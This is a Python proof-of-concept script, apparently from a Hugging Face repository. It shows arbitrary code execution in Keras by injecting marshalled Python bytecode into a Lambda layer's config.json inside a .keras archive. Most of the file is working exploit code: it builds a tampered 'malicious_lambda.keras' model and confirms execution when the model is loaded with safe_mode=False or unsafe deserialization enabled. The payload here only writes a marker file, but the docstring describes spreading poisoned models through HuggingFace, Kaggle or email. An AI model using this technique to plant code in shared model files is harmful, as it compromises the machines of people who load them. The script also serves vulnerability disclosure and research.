# keras-lambda-ace-poc / poc_keras_lambda_ace.py
# Uploaded by Rammadaeus with huggingface_hub (commit 56f70cb, verified)
#!/usr/bin/env python3
"""
Keras .keras Lambda Layer - Arbitrary Code Execution PoC
VULNERABILITY:
.keras model files are ZIP archives containing config.json. Lambda layers
store base64-encoded marshal'd Python bytecode in config.json under the
"function" -> "config" -> "code" key. When a model is loaded with
safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()),
this bytecode is unmarshalled and executed - enabling arbitrary code execution
from a crafted model file.
IMPACT:
Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary
code execution. Many official tutorials and StackOverflow answers recommend
safe_mode=False to load models with custom layers. HuggingFace hosts thousands
of .keras files that could be replaced with malicious versions.
ATTACK VECTOR:
1. Attacker creates a legitimate-looking .keras model
2. Attacker replaces Lambda layer bytecode with malicious payload
3. Victim downloads model from HuggingFace, Kaggle, or email
4. Victim loads with safe_mode=False -> code executes silently
AFFECTED:
- keras >= 3.0 (all versions using .keras format)
- tensorflow >= 2.16 (ships keras 3.x)
TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12
Usage:
python3 poc_keras_lambda_ace.py
"""
import os
import sys
import json
import zipfile
import marshal
import base64
import types
import tempfile
import shutil
# Silence TensorFlow's C++ startup logging so the PoC output stays readable.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
# File the injected payload writes, proving code execution occurred.
MARKER_FILE = "/tmp/keras_ace_marker.txt"
# Content written to the marker file; checked by the test functions below.
PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED"
def create_malicious_keras_model(output_path):
    """Build a tampered .keras archive whose Lambda layer carries a payload.

    Steps: (1) save a legitimate model containing a Lambda layer, (2) unzip
    the .keras archive and swap the marshal'd lambda bytecode stored at
    config.json -> "function" -> "config" -> "code" for a payload that
    writes PAYLOAD_MSG into MARKER_FILE, (3) repack the archive.

    Args:
        output_path: Path where the malicious .keras file is written.

    Exits the process with status 1 if no Lambda layer is found in the
    saved config.json.
    """
    import tensorflow as tf
    import numpy as np  # NOTE(review): unused in this function; kept as-is
    print("[*] Step 1: Building legitimate model with Lambda layer...")
    # The Lambda layer is the injection point: it serializes raw Python
    # bytecode into config.json, unlike ordinary layers.
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(5,)),
        tf.keras.layers.Dense(10, name="dense_1"),
        tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"),
        tf.keras.layers.Dense(1, name="output"),
    ])
    model.compile(optimizer="adam", loss="mse")
    tmp_dir = tempfile.mkdtemp(prefix="keras_poc_")
    legit_path = os.path.join(tmp_dir, "legit.keras")
    model.save(legit_path)
    print(" Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path)))
    print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...")
    # A .keras file is a plain ZIP archive; read every member into memory so
    # the archive can be rewritten with a modified config.json.
    with zipfile.ZipFile(legit_path, "r") as zf:
        archive_files = {name: zf.read(name) for name in zf.namelist()}
    config = json.loads(archive_files["config.json"])
    # Payload lambda: writes the marker file as a side effect, then returns
    # x unchanged so the model keeps working and the tampering stays silent.
    evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format(
        MARKER_FILE, PAYLOAD_MSG
    )
    print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE))
    # Compiling in "eval" mode yields an outer code object whose co_consts
    # holds the lambda's own code object - the value Keras marshals.
    evil_expr = compile(evil_source, "<payload>", "eval")
    lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0]
    # Mirror Keras's own Lambda serialization: marshal, then base64-encode.
    evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n"
    print(" Encoded bytecode: {} chars".format(len(evil_b64)))
    def inject_into_lambda(obj):
        # Depth-first walk of the nested dict/list config; replaces the
        # first Lambda layer's stored bytecode. Returns True once injected.
        if isinstance(obj, dict):
            if obj.get("class_name") == "Lambda" and "config" in obj:
                func = obj["config"].get("function", {})
                if isinstance(func, dict) and "config" in func:
                    func["config"]["code"] = evil_b64
                    print(" Injected payload into Lambda layer config")
                    return True
            for v in obj.values():
                if isinstance(v, (dict, list)) and inject_into_lambda(v):
                    return True
        elif isinstance(obj, list):
            for v in obj:
                if inject_into_lambda(v):
                    return True
        return False
    if not inject_into_lambda(config):
        print(" ERROR: Could not find Lambda layer in config.json")
        sys.exit(1)
    print("[*] Step 3: Repacking .keras file with malicious config...")
    archive_files["config.json"] = json.dumps(config).encode()
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in archive_files.items():
            zf.writestr(name, data)
    print(" Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
    shutil.rmtree(tmp_dir)
def test_safe_mode_true(model_path):
    """Load the tampered model with default settings (safe_mode=True).

    Keras should refuse to unmarshal Lambda bytecode and raise. Returns
    True only if the payload's marker file appeared anyway, i.e. the
    safeguard failed.
    """
    import tensorflow as tf

    print("\n[*] Test A: Loading with safe_mode=True (default)...")
    # Start from a clean slate so a stale marker can't cause a false positive.
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    try:
        tf.keras.models.load_model(model_path)
    except Exception as e:
        print(f" Blocked as expected: {str(e)[:150]}")
        return False
    else:
        print(" Model loaded (unexpected)")
        return os.path.exists(MARKER_FILE)
def test_safe_mode_false(model_path):
    """Load the tampered model with safe_mode=False and report ACE.

    Returns True if the payload's marker file exists after either model
    load or a single inference call; False otherwise (including on error).
    """
    import tensorflow as tf
    import numpy as np

    print("\n[*] Test B: Loading with safe_mode=False...")
    # Clear any stale marker so detection reflects this test only.
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)

    def _marker_hit(stage):
        # True (and prints confirmation) iff the payload wrote its marker.
        if not os.path.exists(MARKER_FILE):
            return False
        with open(MARKER_FILE) as fh:
            found = fh.read().strip()
        print(" >>> ACE CONFIRMED ON {}: marker = '{}'".format(stage, found))
        return True

    try:
        loaded = tf.keras.models.load_model(model_path, safe_mode=False)
        print(" Model loaded with safe_mode=False")
        if _marker_hit("LOAD"):
            return True
        print(" No execution on load. Running inference...")
        outcome = loaded.predict(np.random.randn(1, 5), verbose=0)
        print(" Inference result: {}".format(outcome))
        if _marker_hit("INFERENCE"):
            return True
        print(" No ACE triggered")
        return False
    except Exception as e:
        print(" Error: {}".format(str(e)[:300]))
        return False
def test_enable_unsafe_deserialization(model_path):
    """Load the tampered model after enabling unsafe deserialization globally.

    Calls tf.keras.config.enable_unsafe_deserialization() - a process-wide
    switch that makes every subsequent load_model() behave like
    safe_mode=False - then loads the model and runs one inference.

    Returns True if the payload's marker file exists after load or
    inference; False otherwise (including on error).
    """
    import tensorflow as tf
    import numpy as np
    print("\n[*] Test C: Loading with enable_unsafe_deserialization()...")
    # Clear any stale marker so detection reflects this test only.
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    try:
        # NOTE: this flag is global and is not reset afterwards; run this
        # test last so it cannot mask the safe_mode defaults in Tests A/B.
        tf.keras.config.enable_unsafe_deserialization()
        loaded = tf.keras.models.load_model(model_path)
        print(" Model loaded with enable_unsafe_deserialization")
        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                content = f.read().strip()
            print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
            return True
        print(" No execution on load. Running inference...")
        result = loaded.predict(np.random.randn(1, 5), verbose=0)
        # Print the result for parity with test_safe_mode_false (it was
        # previously assigned but never used).
        print(" Inference result: {}".format(result))
        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                content = f.read().strip()
            print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
            return True
        print(" No ACE triggered")
        return False
    except Exception as e:
        print(" Error: {}".format(str(e)[:300]))
        return False
def main():
    """Drive the PoC: build the tampered model, then run all three load tests."""
    banner = "=" * 70
    print(banner)
    print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC")
    print(banner)
    here = os.path.dirname(os.path.abspath(__file__))
    model_path = os.path.join(here, "malicious_lambda.keras")
    # Remove any leftover marker from a previous run before building.
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    create_malicious_keras_model(model_path)
    hit_default = test_safe_mode_true(model_path)
    hit_flag = test_safe_mode_false(model_path)
    hit_global = test_enable_unsafe_deserialization(model_path)
    print("\n" + banner)
    print("RESULTS:")
    print(f" safe_mode=True (default): {'ACE!' if hit_default else 'Blocked (correct)'}")
    print(f" safe_mode=False: {'ACE!' if hit_flag else 'No ACE'}")
    print(f" enable_unsafe_deserialization(): {'ACE!' if hit_global else 'No ACE'}")
    print()
    if hit_flag or hit_global:
        print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary")
        print("code execution when loaded with safe_mode=False or after calling")
        print("enable_unsafe_deserialization().")
        print()
        print(f"Marker file: {MARKER_FILE}")
        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as fh:
                print(f"Contents: {fh.read().strip()}")
        print(f"\nMalicious model saved to: {model_path}")
    else:
        print("No ACE triggered. Check TensorFlow/Keras version.")
    print(banner)


if __name__ == "__main__":
    main()